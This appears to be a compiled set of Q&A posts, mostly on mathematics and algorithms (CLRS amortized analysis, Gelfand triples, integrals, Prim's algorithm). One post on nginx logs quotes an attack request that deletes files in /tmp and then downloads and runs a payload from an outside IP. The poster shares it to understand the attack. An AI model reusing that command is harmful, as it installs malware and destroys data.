## algorithm analysis – \$\Phi_1=1\$ or \$\Phi_1=2\$ for the dynamic \$\text{Table-Insert}\$, where \$\Phi_i\$ is the potential function after the \$i\$th operation, as per CLRS

The following is the section on dynamic tables from Introduction to Algorithms by Cormen et al.

In the following pseudocode, we assume that $$T$$ is an object representing the table. The field $$table(T)$$ contains a pointer to the block of storage representing the table. The field $$num(T)$$ contains the number of items in the table, and the field $$size(T)$$ is the total number of slots in the table. Initially, the table is empty: $$num(T) = size(T) = 0$$.

$$\text{Table-Insert}(T,x)$$

$$1\quad \text{if } size(T) = 0$$

$$2\quad\quad \text{then allocate } table(T) \text{ with 1 slot}$$

$$3\quad\quad size(T) \leftarrow 1$$

$$4\quad \text{if } num(T) = size(T)$$

$$5\quad\quad \text{then allocate } \textit{new-table} \text{ with } 2 \cdot size(T) \text{ slots}$$

$$6\quad\quad\quad \text{insert all items in } table(T) \text{ into } \textit{new-table}$$

$$7\quad\quad\quad \text{free } table(T)$$

$$8\quad\quad\quad table(T) \leftarrow \textit{new-table}$$

$$9\quad\quad\quad size(T) \leftarrow 2 \cdot size(T)$$

$$10\quad \text{insert } x \text{ into } table(T)$$

$$11\quad num(T) \leftarrow num(T) + 1$$
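To see the numbers concretely, here is a minimal Python sketch (my own, not CLRS code) that mirrors the pseudocode's counters and tracks the amortized cost $$\widehat{c_i} = c_i + \Phi_i - \Phi_{i-1}$$ with $$\Phi(T) = 2 \cdot num(T) - size(T)$$:

```python
# Minimal sketch of CLRS Table-Insert with potential tracking.
# Only the counters num and size matter for the analysis, so the
# table contents themselves are elided.

def table_insert_costs(n):
    """Return the amortized costs c_i + Phi_i - Phi_{i-1}
    for a sequence of n Table-Insert operations."""
    num, size = 0, 0
    phi = 0  # Phi_0 = 2*0 - 0 = 0
    amortized = []
    for _ in range(n):
        if size == 0:
            size = 1          # allocate a 1-slot table
            cost = 1          # one elementary insertion
        elif num == size:
            cost = num + 1    # copy num old items, then insert one
            size = 2 * size   # expansion
        else:
            cost = 1          # plain insertion
        num += 1
        new_phi = 2 * num - size
        amortized.append(cost + new_phi - phi)
        phi = new_phi
    return amortized

print(table_insert_costs(8))  # → [2, 3, 3, 3, 3, 3, 3, 3]
```

The very first operation comes out as $$2$$ and every subsequent one as $$3$$, which is exactly the tension the rest of this question is about.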

For the amortized analysis of a sequence of $$n$$ $$\text{Table-Insert}$$ operations, the potential function they choose is as follows:

$$\Phi(T) = 2 \cdot num(T) - size(T)$$

To analyze the amortized cost of the $$i$$th $$\text{Table-Insert}$$ operation, we let $$num_i$$ denote the number of items stored in the table after the $$i$$th operation, $$size_i$$ denote the total size of the table after the $$i$$th operation, and $$\Phi_i$$ denote the potential after the $$i$$th operation.

Initially, we have $$num_0 = 0$$, $$size_0 = 0$$, and $$\Phi_0 = 0$$.

If the $$i$$th Table-Insert operation does not trigger an expansion, then we have $$size_i = size_{i-1}$$ and $$num_i = num_{i-1} + 1$$. With $$\widehat{c_i}$$ denoting the amortized cost and $$c_i$$ the actual cost,

$$\widehat{c_i} = c_i + \Phi_i - \Phi_{i-1} = 3 \text{ (details not shown)}$$
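For completeness, the omitted details in the no-expansion case amount to (using $$c_i = 1$$, $$num_i = num_{i-1} + 1$$, and $$size_i = size_{i-1}$$):

$$\widehat{c_i} = 1 + (2 \cdot num_i - size_i) - (2 \cdot num_{i-1} - size_{i-1}) = 1 + 2(num_i - num_{i-1}) = 3$$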

If the $$i$$th operation does trigger an expansion, then we have $$size_i = 2 \cdot size_{i-1}$$ and $$size_{i-1} = num_{i-1} = num_i - 1$$, so again,

$$\widehat{c_i} = c_i + \Phi_i - \Phi_{i-1} = 3 \text{ (details not shown)}$$
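Here the omitted details use $$c_i = num_i$$ (copying the $$num_{i-1} = num_i - 1$$ old items plus one insertion), $$\Phi_i = 2 \cdot num_i - 2(num_i - 1) = 2$$, and $$\Phi_{i-1} = 2(num_i - 1) - (num_i - 1) = num_i - 1$$:

$$\widehat{c_i} = num_i + 2 - (num_i - 1) = 3$$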

Now the problem is that they do not show the calculation of $$\widehat{c_1}$$, i.e. the situation for the first insertion of an element into the table (only lines 1, 2, 3, 10, and 11 of the code get executed).

In that situation, the cost is $$c_1 = 1$$, $$\Phi_0 = 0$$, and $$num_1 = size_1 = 1 \implies \Phi_1 = 2 \cdot 1 - 1 = 1$$

We see that $$\Phi_1 = 1 \tag{1}$$

So, $$\widehat{c_1} = c_1 + \Phi_1 - \Phi_0 = 2$$

But the text says that the amortized cost is $$3$$ (I feel they should have said the amortized cost is at most $$3$$, from what I can understand).

Moreover, in the plot below,

The text graphically represents $$\Phi_1 = 2$$, which sort of contradicts $$(1)$$; but as per the graph, if we assume $$\Phi_1 = 2$$, then $$\widehat{c_i} = 3\ \forall i$$.

I do not quite see where I am going wrong.

## fa.functional analysis – A weaker weak time derivative than the one arising from Gelfand triples?

Let $$V \subset H \subset V^*$$ be a Gelfand/evolution triple, where $$V$$ is a reflexive, separable Banach space and $$H$$ is a Hilbert space which has been identified with its dual.

In the context of evolution equations based around the above Gelfand triple, does it ever make sense to think of functions (such as solutions of PDEs) $$u\colon (0,T) \to V$$ with weak time derivative
$$u'\colon (0,T) \to Z$$
where $$Z \supset V^*$$ is a larger space than $$V^*$$ (and belonging only to this space and not also to $$V^*$$, in order not to make this question trivial)?

Note that the weak time derivative can be defined in such a space by the formula
$$\int_0^T u(t)\varphi'(t)\,\mathrm{d}t = -\int_0^T u'(t)\varphi(t)\,\mathrm{d}t \quad \forall \varphi \in C_c^\infty(0,T)$$
with the equality in $$Z$$.

The question is whether, when working in the context of a Gelfand triple for evolution equations (e.g. parabolic PDEs), it makes sense to consider even weaker time derivatives than those usually used with values in $$V^*$$. AFAIK the Gelfand triple is needed precisely to set up the weak time derivative and its appropriate properties.

## real analysis – Evaluate the integral \$\int_{0}^{\pi}\!{\rm e}^{x}\sqrt{\sin(x)}\,{\rm d}x\$.

Question inspired by: Does \$\int_0^{\pi} e^x \sin^n(x)\,\mathrm{d}x\$ have a closed form?

Prove or disprove:
$$\int_{0}^{\pi}\!{\rm e}^{x}\sqrt{\sin(x)}\,{\rm d}x = \frac{\pi^{3/2}\,{\rm e}^{\pi/2}}{2^{3/2}\,\Gamma(5/4 + i/2)\,\Gamma(5/4 - i/2)}$$

(1) Maple says it is correct to 100 decimals.
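As an independent numerical check, here is a Python sketch (assuming SciPy; `scipy.special.gamma` accepts complex arguments):

```python
import numpy as np
from scipy.integrate import quad
from scipy.special import gamma

# Left-hand side: numerical quadrature of e^x * sqrt(sin x) over [0, pi].
lhs, _ = quad(lambda x: np.exp(x) * np.sqrt(np.sin(x)), 0, np.pi)

# Right-hand side: the conjectured closed form.  The product of the two
# conjugate Gamma values equals |Gamma(5/4 + i/2)|^2, which is real.
g = (gamma(1.25 + 0.5j) * gamma(1.25 - 0.5j)).real
rhs = np.pi**1.5 * np.exp(np.pi / 2) / (2**1.5 * g)

print(lhs, rhs)  # the two values agree to well within quadrature error
```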

(2) According to the cited problem,
$$\int_{0}^{\pi}\!{\rm e}^{x}\sin^{n}(x)\,{\rm d}x = \frac{\pi\,{\rm e}^{\pi/2}\,\Gamma(n+1)}{2^{n}\,\Gamma(n/2+1+i/2)\,\Gamma(n/2+1-i/2)}$$
holds for all nonnegative integers $$n$$.
May we conjecture that it holds for all
complex numbers $$n$$ except the negative integers?

## real analysis – How to find the bounds of a volume integral?

I'm studying integration over volumes and I don't know how to set the bounds in this exercise:

Let $$\Omega := \{ (x,y,z) \in \mathbb{R}^3 \mid \frac{x^2}{4} + y^2 + \frac{z^2}{9} < 1 \}$$ and $$\tilde{x} = (x,y,z)$$.

I want to compute the following integral:

\begin{align} \int_\Omega (6xz + 2y + 3z^2) \,\mathrm{d}\tilde{x}. \end{align}

I reckon it's best to start off with the first term, using Fubini:

\begin{align} \int_\Omega 6xz \,\mathrm{d}\tilde{x} = 6 \int_\Omega xz \,\mathrm{d}x \,\mathrm{d}y \,\mathrm{d}z \\ = 6 \int_?^? z \int_?^? \int_?^? x \,\mathrm{d}x \,\mathrm{d}y \,\mathrm{d}z, \end{align}

but I don't know how to define the bounds for each of the integrals. Obviously they depend on $$\Omega$$, and it's easy to see that $$\Omega$$ is a stretched 3D ellipsoid. My intuition is to somehow use spherical coordinates, but how exactly can I set the bounds?

Cheers
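As a sanity check for whichever bounds one ends up with, here is a hedged Python/SciPy sketch (my own, not part of the exercise): substituting $$x = 2u$$, $$y = v$$, $$z = 3w$$ maps $$\Omega$$ to the unit ball with Jacobian $$6$$, and in spherical coordinates on the ball every bound is a constant.

```python
import numpy as np
from scipy.integrate import tplquad

# Substitute x = 2u, y = v, z = 3w, mapping the ellipsoid to the unit
# ball u^2 + v^2 + w^2 < 1 (Jacobian 2*1*3 = 6), then use spherical
# coordinates (rho, theta, phi) on the ball, so all bounds are constant.
def integrand(rho, theta, phi):
    u = rho * np.sin(theta) * np.cos(phi)
    v = rho * np.sin(theta) * np.sin(phi)
    w = rho * np.cos(theta)
    x, y, z = 2 * u, v, 3 * w
    f = 6 * x * z + 2 * y + 3 * z**2
    return f * 6 * rho**2 * np.sin(theta)  # 6 = map Jacobian, rho^2 sin(theta) = spherical

val, err = tplquad(integrand,
                   0, 2 * np.pi,                                # phi
                   lambda phi: 0, lambda phi: np.pi,            # theta
                   lambda phi, theta: 0, lambda phi, theta: 1)  # rho

print(val, 216 * np.pi / 5)
```

By symmetry the odd terms $$6xz$$ and $$2y$$ integrate to zero, so the value should reduce to $$3 \int_\Omega z^2 \,\mathrm{d}\tilde{x} = 3 \cdot \frac{4\pi}{15} \cdot 2 \cdot 1 \cdot 3 \cdot 9 = \frac{216\pi}{5}$$, which the quadrature confirms.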

## calculus and analysis – Solving integral involving absolute value of a vector

I am trying to integrate the following in mathematica:
$$\int_0^r \frac{\exp(-k_d(|\vec{r}-\vec{r}_j| + |\vec{r}-\vec{r}_i|))}{|\vec{r}-\vec{r}_j| \times |\vec{r}-\vec{r}_i|} \, r^2 \, \mathrm{d}r$$.
I have first defined the following functions:
$$\vec{p}(x,y,z) = (x-x_j)\hat{i} + (y-y_j)\hat{j} + (z-z_j)\hat{k}$$
Similarly,
$$\vec{q}(x,y,z) = (x-x_i)\hat{i} + (y-y_i)\hat{j} + (z-z_i)\hat{k}$$.
And,
$$\vec{r}(x,y,z) = x\hat{i} + y\hat{j} + z\hat{k}$$
Then I clicked the integration symbol in the classroom assistant panel and typed the integrand in the $$expr$$ portion. While typing this, I used $$Abs$$ to take the modulus of the functions $$\vec{p}(x,y,z)$$ and $$\vec{q}(x,y,z)$$. I set the limits as $$0$$ to $$Abs(r)$$ and the $$var$$ as $$r$$ in the integration symbol.
But when I press (Shift + Enter), no output value is shown. Can anyone tell me where I have made a mistake?

## runtime analysis – What is considered an asymptotic improvement for graph algorithms?

Let's say we are trying to solve some algorithmic problem A that depends on an input of size n.
We say algorithm B, which runs in time T(n), is asymptotically better than algorithm C, which runs in time G(n), if we have:
T(n) = O(G(n)), but G(n) is not O(T(n)).

My question is related to the asymptotic running time of graph algorithms, which is usually dependent on |V| and |E|.
Specifically, I want to focus on Prim's algorithm. If we implement the priority queue with a binary heap, the run-time would be O(E log V). With a Fibonacci heap we could get a run-time of O(V log V + E).

My question is: do we say that O(V log V + E) is asymptotically better than O(E log V)?

Let me clarify: I know that if the graph is dense the answer is yes. But if E = O(V), both solutions are the same.
I am more interested in what is usually defined as an asymptotic improvement in the case where we have more than one variable, and, even worse, the variables are not independent (V - 1 <= E < V^2, since we assume the graph is connected for Prim's algorithm).

Thanks!

## log analysis – Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

```
170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://(IP OF MY SERVER):80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-"
```

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell from these entries what specific exploit was attempted?

## Pull the limit inside the infinite series in complex analysis?

Let $$f\colon U \to \Bbb{C}$$ be a holomorphic function, where $$U$$ is an open set of the complex plane. We have
$$f(z) = (z-z_0)^m \sum_{k=0}^{\infty} a_{k+m} (z-z_0)^k$$
with $$m \geq 1$$. In my course, it is written that the right-hand side converges on some ball $$B_r(z_0)$$, thus:
$$\lim_{z \rightarrow z_0} \frac{f(z)}{(z-z_0)^m} = \lim_{z \rightarrow z_0} \sum_{k=0}^{\infty} a_{k+m} (z-z_0)^k = a_m$$
I don't understand why we can move the limit inside the infinite series… Is this a result from complex analysis?

## fa.functional analysis – \$\|(A_n-z)^{-1} - (A-z)^{-1}\| \to 0 \;\Rightarrow\; \|e^{-tA_n}-e^{-tA}\| \to 0\$ for general \$C_0\$ semigroups?

In short, the question is whether norm-resolvent convergence implies operator-norm convergence of the associated semigroups. More specifically, assume the following:

1. The $$A_n$$ generate contraction semigroups for all $$n$$,
2. $$A$$ generates a contraction semigroup,
3. One has $$\|(A_n+1)^{-1} - (A+1)^{-1}\| \to 0$$ in operator norm.

Then, can one get anything better than strong convergence for the associated semigroups (preferably operator-norm convergence for some fixed $$t > 0$$)?

The answer is relatively simple for analytic semigroups, since in that case one has an integral formula that expresses the semigroup in terms of the resolvent. For general $$C_0$$ semigroups, it’s much less obvious…

## real analysis – Functions with a Jacobian whose columns are orthogonal

I am interested in functions whose Jacobian has orthogonal columns; i.e. if $$\mathbf{f}(\cdot)\colon \mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$$ is a function where $$\mathbf{f}(\mathbf{x}) = (f_1(\mathbf{x}), f_2(\mathbf{x}), \dots, f_n(\mathbf{x}))^{\rm T}$$, I am looking for all such functions that satisfy:

$$\forall~\mathbf{x} \in \mathbb{R}^{n} \quad \text{and} \quad 1 \leq i,j \leq n: \quad \big(\nabla f_i(\mathbf{x})\big)^{\rm T} \nabla f_j(\mathbf{x}) = \begin{cases} 0 &: i \neq j \\ g_{i}(\mathbf{x}) &: i = j \end{cases}$$

A similar question has been asked here. As I understood, in Liouville's theorem for conformal maps all the diagonal elements of the Jacobian $$\nabla\mathbf{f}(\mathbf{x})$$ are the same. Here, however, I am looking for a generalized case where the diagonal elements are not necessarily the same. Do we have something similar to Liouville's theorem for this case?

Thanks.